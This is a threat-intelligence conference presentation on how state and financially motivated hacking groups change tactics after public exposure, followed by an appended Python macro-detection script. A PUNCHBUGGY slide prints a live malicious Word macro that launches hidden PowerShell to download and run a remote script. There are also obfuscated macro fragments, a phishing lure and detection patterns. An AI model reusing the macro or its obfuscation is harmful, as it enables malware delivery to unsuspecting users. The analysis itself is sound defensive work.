SESSION ID: TTA1-F04

###### Hide and Seek: How Threat Actors Respond in the Face of Public Exposure

Marcin Siedlarz, Senior Threat Intelligence Analyst, FireEye, Inc. (@siedlmar)
Kristen Dennesen, Senior Threat Intelligence Analyst, FireEye, Inc.

-----

###### Have you ever been directly involved in a public white paper or blog about a threat actor?

-----

###### Do you use vendor white papers or blogs to develop better situational awareness about threats to your organization?

-----

- “APT” Groups: Groups conducting network operations on behalf of a nation state. Includes cyber espionage and network attack activity.
- “FIN” Groups: Well organized, capable intrusion teams that conduct intrusions for financial gain. Seek to steal information that can be monetized.
- TTPs: “Tactics, Techniques and Procedures” – the “toolkit” and methods threat actors use to achieve their objectives.

-----

###### How do threat groups respond when their operations are exposed in public reporting?

-----

#### Public exposure is a major trigger for behavioral change

-----

###### By the end of this presentation you’ll be able to…

Evaluate the impact of a blog or white paper on an adversary’s future operations

-----

- Introduction
- Key Concepts
- Case Studies
- Call to Action

-----

###### Computer network: intelligence collection vs. defense

-----

- Public spotlight creates a flashpoint of awareness of a group’s ops and TTPs
- Security vendors sprint to detect publicized activity
- Net defenders are more likely to hunt in their networks for evidence of a group and to employ new IOCs or detection methods
- Exposure triggers public awareness and increases threat groups’ risk of

-----

- What ethical boundaries and obligations do security researchers face?
- Are we cultivating better OPSEC in the actors we expose?
- What is the best way to share?

Mission vs. Marketing

-----

###### Threat Shifting

“Response from adversaries to perceived safeguards and/or countermeasures, in which the adversaries change some characteristic of their [operations] in order to avoid and/or overcome those safeguards/countermeasures”
— NIST Special Publication 800-30: Guide for Conducting Risk Assessments

-----

###### Evolution to reduce the risk of predation

Mimicry: Heliconius butterflies mimic wing coloration patterns to signal toxicity to predators

-----

###### Examples of Threat Shifting

- Evolution of banking Trojans from clumsy keyloggers to highly flexible webinject offerings
- Adoption of PowerShell and WMI for lateral movement and backdoor functionality

-----

###### Threat shifting occurs across four domains:

- PLANNING & TIMING
- TARGETS
- RESOURCES
- METHODS

-----

###### Exposure / Remediation / Detection

-----

###### Our observations are based on FireEye’s visibility.

-----

###### How do threat groups respond when their operations are exposed in public reporting?

-----

### They know.

###### Threat groups are often keenly aware of research & reporting on their operations.

-----

###### APT28 signals they are aware of security researchers’ blogs (and none too pleased…)

- July 2015 blog on APT28 spear phishing campaign that leveraged a Java zero-day
- Within 1 day, APT28 updated DNS info for the domain hosting the exploit to point to TrendMicro’s IP space

-----

###### Threat Actors Read the News, Too.
- APT1: Major interruption to APT1’s operations
- Careto/Mask: “…after the post was published, the Mask operators shut everything down within about four hours”
- APT3 aka UPS: Changed tactics on the fly in direct response to FireEye blog

-----

###### APT29 aka the Dukes, CozyDuke, TEMP.Monkey, Cozy Bear

- July 3, 2015: Downloader compiled
- July 7, 2015: Phish sent: National Endowment for Democracy lure
- July 8, 2015: Phish payload submitted to VT
- July 14, 2015: Security researchers likely analyzing samples; probing staging server
- July 14, 2015: Payload files deleted from compromised server

-----

###### Some actors actively seek to MANIPULATE public perception.

-----

###### Public reports can be deeply disruptive to a threat group’s operations… or not.

### Incentives matter.

-----

###### FIN4: Targeted 100+ organizations seeking information that would convey a stock trading advantage

-----

- Summer 2014: Incident response at victims; similar TTPs and targets
- Summer – Fall 2014: FIN4 actively targeting new victims; adds dozens of new targets in
- Dec. 1, 2014: FIN4 REPORT PUBLISHED
- Dec. 2014: FIN4 DISCONTINUES OPS

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

APT28: global intelligence collection operation targeting information tightly aligned w/ Russian government interests.

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

[Timeline chart, 18-Sep-14 to 12-Dec-15]

**20+** reports examining APT28 TTPs, Oct. 2014 – Oct. 2015

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

[Timeline chart, 18-Sep-14 to 12-Dec-15]

In spite of repeated exposure, APT28 has sustained operations

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

December 2014
- Password reset theme employing bit.ly
- Links configured to look like legit Google URLs

March 2015
- Abuse of Yahoo OAuth service to enable phishing
- Phishing e-mails point to legit Yahoo URL

August 2015
- Streamlined redirection scripts
- Employed campaign identifiers

-----

###### Opportunistic vs. Requirements Driven

-----

##### Public reports are a common trigger for retooling

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

## APT12

Active since at least 2009. Conducts cyber espionage for the purposes of intelligence collection.

Industries Targeted: Aerospace & Defense; Business & Professional Services; Construction & Engineering; Education; Energy; Financial Services & Insurance; Government Organizations; International Organizations; Healthcare & Pharmaceuticals; High Tech & IT; Media and Entertainment; Retail and Consumer Goods; Telecommunications

Countries Targeted: Australia, Netherlands, Egypt, Taiwan, India, Tunisia, United States, Japan

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

- Jan. 31, 2013: New York Times exposes APT12 intrusion in their environment
  - Exposure triggered brief pause in activity and immediate changes in TTPs
- June 6, 2014: APT12’s RIPTIDE aka Etumbot backdoor is the subject of a comprehensive white paper
  - White paper triggered rapid shift in toolset.

**New York Times — Jan. 31, 2013**
-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

[Timeline chart, 4/1/12 to 1/31/16: RIPTIDE aka Etumbot, Shoco; HIGHTIDE; marker: June 2014 Arbor Networks paper on RIPTIDE aka Etumbot]

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

[Timeline chart, 4/1/12 to 1/31/16: RIPTIDE aka Etumbot, Shoco; HIGHTIDE; WATERSPOUT; marker: June 2014 Arbor Networks paper on RIPTIDE aka Etumbot]

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

RIPTIDE GET request

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

HIGHTIDE GET request

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

RIPTIDE traffic encryption: BASE64, RC4

-----

###### APT12 aka DNSCALC, IXESHE, CALC Team, DynCalc, Numbered Panda

HIGHTIDE traffic encryption: BASE64, XOR + 12-byte “salt”, RSA-encrypted RC4

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

## APT17

Conducts cyber espionage for the purposes of intellectual property theft.

Industries Targeted: Aerospace & Defense; Business & Professional Services; Construction & Engineering; Energy; Financial Services & Insurance; Government Organizations; International Organizations; High Tech & IT; Media and Entertainment; Retail & Consumer Goods; Telecommunications; Transportation

Countries Targeted: Taiwan, Germany, Japan, United Kingdom, United States, South Korea
Frequently targets Japanese organizations

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

More than an exposure effort:
- Coalition sought to eradicate specific ‘high value’ tools and make it more expensive for APT17 to operate
- Coordinated action was accompanied by public materials to aid detection and educate victims

Operation SMN coalition went into the effort with eyes wide open:
- Acknowledged from outset that APT17 was skilled, equipped

-----

###### Operation SMN sought to KNOCK OUT APT17’S high value tools such as HIKIT

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

[HIKIT timeline chart]
- August 2014: Last observed HIKIT compile date (based on malware sample compile times)
- Legend: Timespan Observed

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

[HIKIT timeline chart]
- September 28, 2014: Last observed sample created on victim host
- Legend: Timespan Observed; File created on victim host

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

[HIKIT timeline chart]
- September 28, 2014: Last observed sample created on victim host
- October 2014: Operation SMN Public Action
- Legend: Timespan Observed; File created on victim host

-----

###### October 2014 Operation SMN Public Action

**HIKIT**

-----

###### October 2014 Operation SMN Public Action

**MUGBRAIN** **RAYGUN** **HIKIT**

-----

###### October 2014 Operation SMN Public Action

**SCARYMOVIE** **HIGHNOTE** **SIDEWINDER** **HIGHNOON aka Winnti** **MUGBRAIN** **RAYGUN** **HIKIT** **BLACKCOFFEE aka ZoxPNG** **LONEAGENT aka Fexel** **PHOTO aka Derusbi** **SOGU aka PlugX, Kabas**

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

[LONEAGENT aka Fexel timeline chart]
- October 2014: Operation SMN Public Action

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

[LONEAGENT aka Fexel timeline chart]
- October 2014: Operation SMN Public Action
- February 2015: APT17 begins consistently armorizing LONEAGENT samples

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

Quick retooling and adaptation

-----

###### Suspected FIN threat actor rapidly changes TTPs after public reporting: “PUNCHBUGGY”

-----

[Timeline chart, 7/15/15 to 8/18/16]
- 8-9 March 2016: McAfee, Bromium blogs

-----

Source: https://blogs.mcafee.com/mcafee-labs/macro-malware-associated-dridex-finds-new-ways-hide/

-----

Source: https://labs.bromium.com/2016/03/09/macro-malware-connecting-to-github/

-----

[Timeline chart, 7/15/15 to 8/18/16]
- 8-9 March 2016: McAfee, Bromium blogs
- 10 March 2016: TTPs shift
- 11 March 2016: PaloAltoNetwork’s report

-----

```vb
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
Const HIDDEN_WINDOW = 0
strComputer = "."
x1 = "Download"
x2 = "String"
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) { (new-object Net.WebClient)." & x1 & x2 & "('https://github[.]com/consfw/msfw/raw/master/README') | iex } else { (new-object Net.WebClient)." & x1 & x2 & "('https://github[.]com/consfw/msfw/raw/master/TODO') | iex}", Null, objConfig, intProcessID
End Sub
```

-----

```vb
Private Const WCmOFNHznPSAokywsh As String = "xQFPBbfIMjTtUhckEoudAVzYvgisNaHXDOSZLeq"
Private Const AFPsxGjINKYLfVUvui As String = "KpvTdPCRFgoyJOucw"
Private Const NvqAHROKeCVtWf As String = "lDtgNZkfMizcGIsBR"
Private Const pcAFWyJEkv As String = "zkCLKVfGXWuBFlTMwOURYnIbhveNP"
Private Const LNkFVBSQeDvznpmH As String = "XxqdyculNPvJrEDCAGhYUIbVmjMkRQ"
Private Const ZoXxOaDMdzsglBV As String = "cIbXZqiBdKuSgETwHGoCWDefPhYpvALlzVrjysUmxNaQ"
Private Const gyMRPIeKLJnsHuatlpc As String = "QOVAFGiBvIexypDbloSqcRhLszaEnZjWTMKPUYgrdwuHfJ"
Private Const DKjYtIzTqvpuXPw As String = "mJbxngCeZtlksVEpiKHNBv"
Private Const ULMYzFkgZpdqs As String = "NlpDMBhuRLOJvySeGzjsgwIVtfiZCdnqA"
Private Const KbumUjRiJXrx As String = "jlbmaHhfdstKUgkDBC"
Private Const LWSjdoRABU As String = "sEAeZptMyInzPVHjJoK"
Private Const gnAcwqCyivtBsfVhm As String = "mOQsBrgUpENXMSTjhFDbCIWlk"
Private Const YQbAcyLxgojHlrpUG As String = "HtCKmkRQTpv"
Private Const TJWFglmHsLUDpVorbyB As String = "BiHwTdnKbGvVkrfMJIFouXUNqCmlaeL"
```

And so on…

-----

[Timeline chart, 7/15/15 to 8/18/16]
- 8-9 March 2016: McAfee, Bromium blogs
- 2 May 2016: TTPs shift

-----

```vb
Private Function ieviAaZ296N3Ve() As String
    ieviAaZ296N3Ve = cin1A9DKSxWMDQT("taoeptIxicetj3td.rtBD.edfhIQ2ma/xse3/a/ar0/mc:DMh", 1575)
End Function
Private Function Z2rLBQGmQVZx() As String
    Z2rLBQGmQVZx = cin1A9DKSxWMDQT("t./d/caef:tFEBxx4aem.ae/phkI84t6imodcr/tHyPs7", 1455)
End Function
Private Function dMz9cDR9IkYHKjS() As String
    dMz9cDR9IkYHKjS = cin1A9DKSxWMDQT("}|3Mx ore)VDi'WY H3B", 184)
End Function
Public Function DA8Ystq() As String
    DA8Ystq = J8eLZoOB6mi9M & ORs8gh & ieviAaZ296N3Ve & kn8hbEV3 & Z2rLBQGmQVZx & dMz9cDR9IkYHKjS
End Function
Private Function J8eLZoOB6mi9M() As String
    J8eLZoOB6mi9M = cin1A9DKSxWMDQT(" xnefp-eietoi aBcooux elsw4kZcte-loo dHlSdWsp iPicEe.eroczz-io irnnd ywn-syylnte-xlhepwXZ", 7320)
End Function
Private Function kn8hbEV3() As String
    kn8hbEV3 = cin1A9DKSxWMDQT("'roDeeNjee} Ci(tl.iW bns |zDgSn)l.to(lx AindwtCtc-{ee)IHiaonbeew i'WV", 4214)
End Function
```

And so on …

-----

to: store
subject: Hi,

As discussed on the phone, I'm sending you the guest list and timing details with pre-order uploaded on dropbox. Would you be so kind as to review this request and let me know about your availability?

hxxps://www.dropbox[.]com/s/XXXX/Reservation%20details%20at%20.doc?dl=1

Would you be so kind as to review this request and let me know about your availability?

Thanks!
Michael.

-----

##### As part of retooling, threat actors can turn on a dime

-----

###### APT3 aka UPS, Gothic Panda

Clandestine Wolf Blog: June 23, 2015

One Day Later: APT3 continued, with modifications:
- Created new phishing emails
- Removed mechanism to profile end user systems
- Modified filenames of files used for exploitation
- Altered shellcode
- Compiled new payloads with updated C2; increased

-----

###### The path of least resistance rules.
#### “If it ain’t broke, don’t fix it.”

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

**May 2015:** FireEye and Microsoft coordinate takedown of BLACKCOFFEE Technet abuse; report technique publicly

**C2 Location**
```
"@MICR0S0FT" "C0RP0RATI0N"
```

-----

###### APT17 aka Axiom, DeputyDog, Tailgater Team, Hidden Lynx, Voho, Group72, AuroraPanda

**August 2015:** Modified BLACKCOFFEE variant targeting JP organizations

**C2 Location**
```
"lOve yOu 4 eveR" "Reve 4 uOy evOl"
```

-----

###### When needed, threat actors will add more resources to get the job done

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

[Timeline chart, 18-Sep-14 to 12-Dec-15]

**20+** reports examining APT28 TTPs, Oct. 2014 – Oct. 2015

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

- _April 2015_: CVE-2015-1701 Windows local privilege escalation vuln
- _April 2015_: CVE-2015-3043 Adobe Flash zero-day
- _July 2015_: CVE-2015-2424 Microsoft Office zero-day
- _July 2015_: CVE-2015-2590 Java zero-day
- _October 2015_: CVE-2015-7645 Adobe Flash zero-day

-----

###### APT28 aka Pawn Storm, Sednit, Sofacy, Fancy Bear, Strontium

APT28 continues to develop new tools
- March 2015: new variant of CORESHELL
- Dec. 2015: New Backdoor
- Jan. 2016: New Launcher

Image Source: Wellness GM @wellness photos on Flickr

-----

###### In Summary…

-----

###### Key Takeaways

- Threat actors are often keenly aware of reporting on their operations
- Exposure can disrupt an actor’s operations… if the incentives are right.
- Public reporting triggers retooling: actors may abandon tools or develop new ones.
- The path of least resistance is often king.
- Sometimes, actors solve the problem by adding resources: time, money, tool development

-----

###### Exposure is a balancing act

Security researchers must continually weigh the benefits of public awareness against possible disruptions to detection and loss of visibility. When executed well, exposure benefits victims, network defenders and the security community at large.

-----

###### When evaluating whether exposing an adversary is the best course of action:

- What impact do we want to have on the adversary?
- How will exposure help/hurt victims and likely future targets?
- How will exposure impact ‘big picture’ concerns like law enforcement efforts?
- Will exposure degrade our ability to detect and

###### When evaluating how a threat actor will likely respond when their operations are exposed:

- How adaptive and capable is the group?
- Groups with a flat toolset and low adaptive capability are more likely to be disrupted
- How determined are they to maintain access to specific targets?
- What shifts to targeting, timing, resourcing & TTPs

-----

###### Thank you

-----
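As an added, defender-side example (not part of the original deck and not the presenters' code), the Python below folds the string splitting used in the first PUNCHBUGGY macro shown earlier ("power" & "shell", x1 & x2) and scores the result against indicators drawn from that macro, which is the kind of static check the March 2016 blogs prompted and the 2 May 2016 custom-decoder variant (cin1A9DKSxWMDQT) was built to defeat. The sample macro, the placeholder repository name and the alert threshold are constructed assumptions.

```python
import re

# Indicators drawn from the macro on the PUNCHBUGGY slide: a hidden, policy-bypassing
# PowerShell spawned through WMI that downloads remote content and pipes it to iex.
INDICATORS = {
    "powershell":      r"\bpowershell(?:\.exe)?\b",
    "exec_bypass":     r"-executionpolicy\s+bypass",
    "hidden_window":   r"-windowstyle\s+hidden",
    "webclient_fetch": r"net\.webclient\)?\.downloadstring",
    "pipe_to_iex":     r"\|\s*iex\b",
    "wmi_spawn":       r"win32_process",
}
_ASSIGN = re.compile(r'^\s*(?:Const\s+)?(\w+)\s*=\s*"([^"\n]*)"\s*$', re.M)
_CONCAT = re.compile(r'"([^"\n]*)"\s*&\s*"([^"\n]*)"')

def normalize_vba(src: str) -> str:
    """Undo the string splitting the macro relies on: join VBA line continuations,
    substitute variables holding string literals (x1 = "Download"), and fold
    "a" & "b" into "ab" until no pairs remain. Pure text rewriting; nothing executes."""
    src = src.replace("[.]", ".")                      # refang defanged sample URLs
    src = re.sub(r"\s_\r?\n\s*", " ", src)             # "..." & _ <newline> "..."
    for name, val in _ASSIGN.findall(src):
        src = re.sub(rf"\s*&\s*{re.escape(name)}\b",
                     lambda m, v=val: f' & "{v}"', src)
    prev = None
    while prev != src:
        prev, src = src, _CONCAT.sub(lambda m: f'"{m[1]}{m[2]}"', src)
    return src

def scan(text: str) -> list[str]:
    """Names of the indicators present in text (case-insensitive)."""
    return [k for k, pat in INDICATORS.items() if re.search(pat, text, re.I)]

def is_suspicious(text: str, threshold: int = 3) -> bool:
    """Flag when at least `threshold` distinct indicators hit in the raw or folded text.
    Process telemetry is the complement: Win32_Process.Create makes WmiPrvSE.exe, not
    WINWORD.EXE, the parent of powershell.exe, so Office->PowerShell parent rules miss it."""
    hits = set(scan(text)) | set(scan(normalize_vba(text)))
    return len(hits) >= threshold

# Constructed sample in the shape of the slide's macro (placeholder repo, defanged URL).
SAMPLE_MACRO = r'''Sub AutoOpen()
strComputer = "."
x1 = "Download"
x2 = "String"
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -c " & _
    "(new-object Net.WebClient)." & x1 & x2 & "('https://github[.]com/EXAMPLE/EXAMPLE/raw/master/README') | iex"
End Sub'''

if __name__ == "__main__":
    print("raw hits:   ", scan(SAMPLE_MACRO))
    print("folded hits:", scan(normalize_vba(SAMPLE_MACRO)), is_suspicious(SAMPLE_MACRO))
```

Folding only the literal-concatenation style leaves the later variant untouched, since its strings come out of a decoder function rather than `&` joins; that gap is the retooling the timeline slides record.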